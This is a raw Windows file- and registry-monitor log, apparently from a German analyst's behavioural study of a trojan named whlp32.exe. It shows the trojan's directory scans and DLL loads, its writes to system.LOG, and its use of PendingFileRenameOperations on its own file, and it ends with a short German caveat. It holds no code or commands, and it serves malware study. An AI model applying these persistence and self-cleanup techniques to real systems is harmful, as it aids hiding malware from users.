4020 07:25:29 csrss.exe:424 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe BUFFER OVERFLOW FileNameInformation
4021 07:25:29 csrss.exe:424 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS FileNameInformation
4022 07:25:29 whlp32.exe:3984 DIRECTORY C:\ NO MORE FILES FileNamesInformation
4023 07:25:29 whlp32.exe:3984 OPEN C:\DOKUMENTE UND EINSTELLUNGEN\ SUCCESS Options: Open Directory Access: All
4024 07:25:29 whlp32.exe:3984 DIRECTORY C:\DOKUMENTE UND EINSTELLUNGEN\ SUCCESS FileNamesInformation
4025 07:25:29 whlp32.exe:3984 DIRECTORY C:\DOKUMENTE UND EINSTELLUNGEN\ NO MORE FILES FileNamesInformation
4026 07:25:29 whlp32.exe:3984 OPEN C:\DOKUMENTE UND EINSTELLUNGEN\ADMINISTRATOR\ SUCCESS Options: Open Directory Access: All
4027 07:25:29 whlp32.exe:3984 DIRECTORY C:\DOKUMENTE UND EINSTELLUNGEN\ADMINISTRATOR\ SUCCESS FileNamesInformation
4028 07:25:29 whlp32.exe:3984 DIRECTORY C:\DOKUMENTE UND EINSTELLUNGEN\ADMINISTRATOR\ NO MORE FILES FileNamesInformation
4029 07:25:29 whlp32.exe:3984 OPEN C:\WINDOWS\ SUCCESS Options: Open Directory Access: All
4030 07:25:29 whlp32.exe:3984 DIRECTORY C:\WINDOWS\ SUCCESS FileNamesInformation
4031 07:25:29 whlp32.exe:3984 DIRECTORY C:\WINDOWS\ NO MORE FILES FileNamesInformation
4032 07:25:29 whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\ SUCCESS Options: Open Directory Access: All
4033 07:25:29 whlp32.exe:3984 DIRECTORY C:\WINDOWS\SYSTEM32\ SUCCESS FileNamesInformation
4034 07:25:29 whlp32.exe:3984 DIRECTORY C:\WINDOWS\SYSTEM32\ SUCCESS FileNamesInformation
4035 07:25:29 whlp32.exe:3984 DIRECTORY C:\WINDOWS\SYSTEM32\ SUCCESS FileNamesInformation
4036 07:25:29 whlp32.exe:3984 DIRECTORY C:\WINDOWS\SYSTEM32\ SUCCESS FileNamesInformation
4037 07:25:29 whlp32.exe:3984 DIRECTORY C:\WINDOWS\SYSTEM32\ SUCCESS FileNamesInformation
4038 07:25:29 whlp32.exe:3984 DIRECTORY C:\WINDOWS\SYSTEM32\ NO MORE FILES FileNamesInformation
4039 07:25:29 whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\NTDLL.DLL SUCCESS Options: Open Access: All
4040 07:25:29 whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\SYSTEM32\NTDLL.DLL SUCCESS Length: 733696
4041 07:25:29 whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\KERNEL32.DLL SUCCESS Options: Open Access: All
4042 07:25:29 whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\SYSTEM32\KERNEL32.DLL SUCCESS Length: 1057280
4043 07:25:29 whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\UNICODE.NLS SUCCESS Options: Open Access: All
4044 07:25:29 whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\SYSTEM32\UNICODE.NLS SUCCESS Length: 89588
4045 07:25:29 whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\LOCALE.NLS SUCCESS Options: Open Access: All
4046 07:25:29 whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\SYSTEM32\LOCALE.NLS SUCCESS Length: 249270
4047 07:25:29 whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\SORTTBLS.NLS SUCCESS Options: Open Access: All
4048 07:25:29 whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\SYSTEM32\SORTTBLS.NLS SUCCESS Length: 22040
4049 07:25:29 whlp32.exe:3984 OPEN C:\DOKUMENTE UND EINSTELLUNGEN\ADMINISTRATOR\WHLP32.EXE SUCCESS Options: Open Access: All
4050 07:25:29 whlp32.exe:3984 QUERY INFORMATION C:\DOKUMENTE UND EINSTELLUNGEN\ADMINISTRATOR\WHLP32.EXE SUCCESS Length: 45297
4051 07:25:29 whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\USER32.DLL SUCCESS Options: Open Access: All
4052 07:25:29 whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\SYSTEM32\USER32.DLL SUCCESS Length: 578560
4053 07:25:29 whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\GDI32.DLL SUCCESS Options: Open Access: All
4054 07:25:29 whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\SYSTEM32\GDI32.DLL SUCCESS Length: 278016
4055 07:25:29 whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\IMM32.DLL SUCCESS Options: Open Access: All
4056 07:25:29 whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\SYSTEM32\IMM32.DLL SUCCESS Length: 110080
4057 07:25:29 whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\ADVAPI32.DLL SUCCESS Options: Open Access: All
4058 07:25:29 whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\SYSTEM32\ADVAPI32.DLL SUCCESS Length: 677888
4059 07:25:29 whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\RPCRT4.DLL SUCCESS Options: Open Access: All
4060 07:25:29 whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\SYSTEM32\RPCRT4.DLL SUCCESS Length: 581120
4061 07:25:29 whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\SORTKEY.NLS SUCCESS Options: Open Access: All
4062 07:25:29 whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\SYSTEM32\SORTKEY.NLS SUCCESS Length: 262148
4063 07:25:29 whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\NTDLL.DLL SUCCESS Options: Open Access: Execute
4064 07:25:29 whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\KERNEL32.DLL SUCCESS Options: Open Access: Execute
4065 07:25:29 whlp32.exe:3984 OPEN C:\DOKUMENTE UND EINSTELLUNGEN\ADMINISTRATOR\WHLP32.EXE SUCCESS Options: Open Access: Execute
4066 07:25:29 whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\USER32.DLL SUCCESS Options: Open Access: Execute
4067 07:25:29 whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\GDI32.DLL SUCCESS Options: Open Access: Execute
4068 07:25:29 whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\IMM32.DLL SUCCESS Options: Open Access: Execute
4069 07:25:29 whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\ADVAPI32.DLL SUCCESS Options: Open Access: Execute
4070 07:25:29 whlp32.exe:3984 OPEN C:\WINDOWS\SYSTEM32\RPCRT4.DLL SUCCESS Options: Open Access: Execute
4071 07:25:29 whlp32.exe:3984 READ C:\DOKUMENTE UND EINSTELLUNGEN\ADMINISTRATOR\WHLP32.EXE SUCCESS Offset: 1024 Length: 40960
4072 07:25:29 whlp32.exe:3984 READ C:\DOKUMENTE UND EINSTELLUNGEN\ADMINISTRATOR\WHLP32.EXE SUCCESS Offset: 41984 Length: 2048
4073 07:25:29 whlp32.exe:3984 READ C:\DOKUMENTE UND EINSTELLUNGEN\ADMINISTRATOR\WHLP32.EXE SUCCESS Offset: 44032 Length: 1024
4074 07:25:29 whlp32.exe:3984 OPEN C:\Dokumente und Einstellungen\Administrator\ SUCCESS Options: Open Directory Access: Traverse
4075 07:25:29 whlp32.exe:3984 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe.Local FILE NOT FOUND Attributes: Error
4076 07:25:30 whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\system32\IMM32.DLL SUCCESS Attributes: A
4077 07:25:30 whlp32.exe:3984 OPEN C:\WINDOWS\system32\IMM32.DLL SUCCESS Options: Open Access: Execute
4078 07:25:30 whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\system32\IMM32.DLL SUCCESS Length: 110080
4079 07:25:30 whlp32.exe:3984 CLOSE C:\WINDOWS\system32\IMM32.DLL SUCCESS
4080 07:25:30 whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\system32\IMM32.DLL SUCCESS Attributes: A
4081 07:25:30 whlp32.exe:3984 OPEN C:\WINDOWS\system32\IMM32.DLL SUCCESS Options: Open Access: Execute
4082 07:25:30 whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\system32\IMM32.DLL SUCCESS Length: 110080
4083 07:25:30 whlp32.exe:3984 CLOSE C:\WINDOWS\system32\IMM32.DLL SUCCESS
4084 07:25:30 whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\system32\IMM32.DLL SUCCESS Attributes: A
4085 07:25:30 whlp32.exe:3984 OPEN C:\WINDOWS\system32\IMM32.DLL SUCCESS Options: Open Access: Execute
4086 07:25:30 whlp32.exe:3984 CLOSE C:\WINDOWS\system32\IMM32.DLL SUCCESS
4087 07:25:30 whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\system32\IMM32.DLL SUCCESS Attributes: A
4088 07:25:30 whlp32.exe:3984 QUERY INFORMATION C:\WINDOWS\system32\IMM32.DLL SUCCESS Attributes: A
4089 07:25:30 whlp32.exe:3984 OPEN C:\Dokumente und Einstellungen\Administrator\$$$$ FILE NOT FOUND Options: Open Access: All
4094 07:25:30 whlp32.exe:3984 READ C:\WINDOWS\system32\kernel32.dll SUCCESS Offset: 377856 Length: 4096
4095 07:25:30 whlp32.exe:3984 OPEN C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS Options: Open Access: All
4096 07:25:30 whlp32.exe:3984 QUERY INFORMATION C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS FileAttributeTagInformation
4097 07:25:30 whlp32.exe:3984 SET INFORMATION C:\WINDOWS\system32\config\system.LOG SUCCESS Length: 8192
4098 07:25:30 whlp32.exe:3984 SET INFORMATION C:\WINDOWS\system32\config\system.LOG SUCCESS Length: 8192
4099 07:25:30 whlp32.exe:3984 SET INFORMATION C:\WINDOWS\system32\config\system.LOG SUCCESS Length: 16384
4100 07:25:30 whlp32.exe:3984 SET INFORMATION C:\WINDOWS\system32\config\system.LOG SUCCESS Length: 20480
4101 07:25:30 whlp32.exe:3984 CLOSE C:\Dokumente und Einstellungen\Administrator\whlp32.exe SUCCESS
4180 07:25:30 svchost.exe:760 OPEN C:\WINDOWS\Prefetch\WHLP32.EXE-37867309.pf SUCCESS Options: Open Access: All
4181 07:25:30 svchost.exe:760 QUERY INFORMATION C:\WINDOWS\Prefetch\WHLP32.EXE-37867309.pf SUCCESS Length: 4726
4182 07:25:30 svchost.exe:760 QUERY INFORMATION C:\WINDOWS\Prefetch\WHLP32.EXE-37867309.pf SUCCESS Length: 4726
4183 07:25:30 svchost.exe:760 CLOSE C:\WINDOWS\Prefetch\WHLP32.EXE-37867309.pf SUCCESS
4184 07:25:30 svchost.exe:760 QUERY INFORMATION C:\DOKUMENTE UND EINSTELLUNGEN\ADMINISTRATOR\WHLP32.EXE SUCCESS Attributes: A
4185 07:25:30 svchost.exe:760 OPEN C:\DOKUMENTE UND EINSTELLUNGEN\ADMINISTRATOR\WHLP32.EXE SUCCESS Options: Open Access: All
4186 07:25:30 svchost.exe:760 QUERY INFORMATION C:\DOKUMENTE UND EINSTELLUNGEN\ADMINISTRATOR\WHLP32.EXE SUCCESS FileInternalInformation
4187 07:25:30 svchost.exe:760 CLOSE C:\DOKUMENTE UND EINSTELLUNGEN\ADMINISTRATOR\WHLP32.EXE SUCCESS
4247 07:25:30 svchost.exe:760 CREATE C:\WINDOWS\Prefetch\WHLP32.EXE-37867309.pf SUCCESS Options: OverwriteIf Access: All
4248 07:25:30 svchost.exe:760 OPEN C:\WINDOWS\Prefetch\ SUCCESS Options: Open Directory Access: 00000000
4249 07:25:30 svchost.exe:760 WRITE C:\WINDOWS\Prefetch\WHLP32.EXE-37867309.pf SUCCESS Offset: 0 Length: 4798
4250 07:25:30 svchost.exe:760 CLOSE C:\WINDOWS\Prefetch\WHLP32.EXE-37867309.pf SUCCESS
Registry-Zugriffe während des Öffnens:
76101 19.29856764 whlp32.exe:1664 OpenKey HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\whlp32.exe NOTFOUND
76102 19.29915320 whlp32.exe:1664 OpenKey HKLM\System\CurrentControlSet\Control\Terminal Server SUCCESS Access: 0x20019
76103 19.29917179 whlp32.exe:1664 QueryValue HKLM\System\CurrentControlSet\Control\Terminal Server\TSAppCompat SUCCESS 0x0
76104 19.29918941 whlp32.exe:1664 CloseKey HKLM\System\CurrentControlSet\Control\Terminal Server SUCCESS
76105 19.29955742 whlp32.exe:1664 OpenKey HKLM\System\CurrentControlSet\Control\Terminal Server SUCCESS Access: 0x20019
76106 19.29957246 whlp32.exe:1664 QueryValue HKLM\System\CurrentControlSet\Control\Terminal Server\TSAppCompat SUCCESS 0x0
76107 19.29958841 whlp32.exe:1664 CloseKey HKLM\System\CurrentControlSet\Control\Terminal Server SUCCESS
76123 20.02893733 whlp32.exe:1664 OpenKey HKLM\System\CurrentControlSet\Control\Session Manager SUCCESS Access: 0x1
76124 20.02895640 whlp32.exe:1664 QueryValue HKLM\System\CurrentControlSet\Control\Session Manager\SafeDllSearchMode NOTFOUND
76125 20.02897613 whlp32.exe:1664 CloseKey HKLM\System\CurrentControlSet\Control\Session Manager SUCCESS
76126 20.02931397 whlp32.exe:1664 OpenKey HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GDI32.dll NOTFOUND
76127 20.02935254 whlp32.exe:1664 OpenKey HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\user32.dll NOTFOUND
76128 20.02991519 whlp32.exe:1664 OpenKey HKLM\System\CurrentControlSet\Control\SafeBoot\Option NOTFOUND
76129 20.02994488 whlp32.exe:1664 OpenKey HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers SUCCESS Access: 0x1
76130 20.02996044 whlp32.exe:1664 QueryValue HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\TransparentEnabled SUCCESS 0x1
76131 20.02997866 whlp32.exe:1664 CloseKey HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers SUCCESS
76132 20.03001308 whlp32.exe:1664 OpenKey HKCU\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers NOTFOUND
76133 20.03037242 whlp32.exe:1664 OpenKey HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RPCRT4.dll NOTFOUND
76134 20.03041198 whlp32.exe:1664 OpenKey HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ADVAPI32.dll NOTFOUND
76135 20.03046216 whlp32.exe:1664 OpenKey HKLM\System\CurrentControlSet\Control\Terminal Server SUCCESS Access: 0x20019
76136 20.03047838 whlp32.exe:1664 QueryValue HKLM\System\CurrentControlSet\Control\Terminal Server\TSAppCompat SUCCESS 0x0
76137 20.03049118 whlp32.exe:1664 QueryValue HKLM\System\CurrentControlSet\Control\Terminal Server\TSUserEnabled SUCCESS 0x0
76138 20.03050713 whlp32.exe:1664 CloseKey HKLM\System\CurrentControlSet\Control\Terminal Server SUCCESS
76139 20.03054450 whlp32.exe:1664 OpenKey HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon SUCCESS Access: 0x20019
76140 20.03056365 whlp32.exe:1664 QueryValue HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LeakTrack NOTFOUND
76141 20.03057812 whlp32.exe:1664 CloseKey HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon SUCCESS
76142 20.03060583 whlp32.exe:1664 OpenKey HKLM SUCCESS Access: 0x2000000
76143 20.03063272 whlp32.exe:1664 OpenKey HKLM\Software\Microsoft\Windows NT\CurrentVersion\Diagnostics NOTFOUND
76144 20.03066348 whlp32.exe:1664 OpenKey HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IMM32.DLL NOTFOUND
76145 20.03078246 whlp32.exe:1664 OpenKey HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ntdll.dll NOTFOUND
76146 20.03080886 whlp32.exe:1664 OpenKey HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kernel32.dll NOTFOUND
76147 20.03088152 whlp32.exe:1664 OpenKey HKLM\System\CurrentControlSet\Control\Error Message Instrument\ NOTFOUND
76148 20.03106948 whlp32.exe:1664 OpenKey HKLM\Software\Microsoft\Windows NT\CurrentVersion\Compatibility32 SUCCESS Access: 0x20019
76149 20.03109617 whlp32.exe:1664 QueryValue HKLM\Software\Microsoft\Windows NT\CurrentVersion\Compatibility32\whlp32 NOTFOUND
76150 20.03111221 whlp32.exe:1664 CloseKey HKLM\Software\Microsoft\Windows NT\CurrentVersion\Compatibility32 SUCCESS
76151 20.03115099 whlp32.exe:1664 OpenKey HKLM\Software\Microsoft\Windows NT\CurrentVersion\IME Compatibility SUCCESS Access: 0x20019
76152 20.03117299 whlp32.exe:1664 QueryValue HKLM\Software\Microsoft\Windows NT\CurrentVersion\IME Compatibility\whlp32 NOTFOUND
76153 20.03118803 whlp32.exe:1664 CloseKey HKLM\Software\Microsoft\Windows NT\CurrentVersion\IME Compatibility SUCCESS
76154 20.03132066 whlp32.exe:1664 OpenKey HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows SUCCESS Access: 0x20019
76155 20.03133572 whlp32.exe:1664 QueryValue HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs SUCCESS ""
76156 20.03135820 whlp32.exe:1664 CloseKey HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows SUCCESS
76170 20.03285296 whlp32.exe:1664 OpenKey HKLM\Software\Microsoft\Rpc\PagedBuffers NOTFOUND
76171 20.03288796 whlp32.exe:1664 OpenKey HKLM\Software\Microsoft\Rpc SUCCESS Access: 0x20019
76172 20.03290569 whlp32.exe:1664 QueryValue HKLM\Software\Microsoft\Rpc\MaxRpcSize NOTFOUND
76173 20.03292620 whlp32.exe:1664 CloseKey HKLM\Software\Microsoft\Rpc SUCCESS
76174 20.03295595 whlp32.exe:1664 OpenKey HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\whlp32.exe\RpcThreadPoolThrottle NOTFOUND
76175 20.03302641 whlp32.exe:1664 OpenKey HKLM\Software\Policies\Microsoft\Windows NT\Rpc NOTFOUND
76176 20.03318385 whlp32.exe:1664 OpenKey HKLM\System\CurrentControlSet\Control\ComputerName SUCCESS Access: 0x20019
76177 20.03321587 whlp32.exe:1664 OpenKey HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName SUCCESS Access: 0x20019
76178 20.03323429 whlp32.exe:1664 QueryValue HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName\ComputerName SUCCESS "WS2950"
76179 20.03325389 whlp32.exe:1664 CloseKey HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName SUCCESS
76180 20.03327550 whlp32.exe:1664 CloseKey HKLM\System\CurrentControlSet\Control\ComputerName SUCCESS
76189 20.04607113 whlp32.exe:1664 CreateKey HKLM\System\CurrentControlSet\Control\Session Manager SUCCESS Access: 0xC0000000
76190 20.04610976 whlp32.exe:1664 QueryValue HKLM\System\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations2 NOTFOUND
76191 20.04614400 whlp32.exe:1664 CloseKey HKLM\System\CurrentControlSet\Control\Session Manager SUCCESS
76192 20.04619187 whlp32.exe:1664 CreateKey HKLM\System\CurrentControlSet\Control\Session Manager SUCCESS Access: 0xC0000000
76193 20.04621679 whlp32.exe:1664 QueryValue HKLM\System\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations SUCCESS "\??\C:\Dokumente und Einstellungen\Administrator\whlp32.exe"
76194 20.04665349 whlp32.exe:1664 SetValue HKLM\System\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations SUCCESS "\??\C:\Dokumente und Einstellungen\Administrator\whlp32.exe"
76195 20.04667575 whlp32.exe:1664 CloseKey HKLM\System\CurrentControlSet\Control\Session Manager SUCCESS
Der Trojaner legt also mehrere Dateien auf der Festplatte an und führt diese aus. Den Code dieser EXE-Dateien habe ich nicht untersucht. Das obige Protokoll ist also keine Gewähr dafür, dass nicht doch etwas Schlimmes mit den Daten passiert….
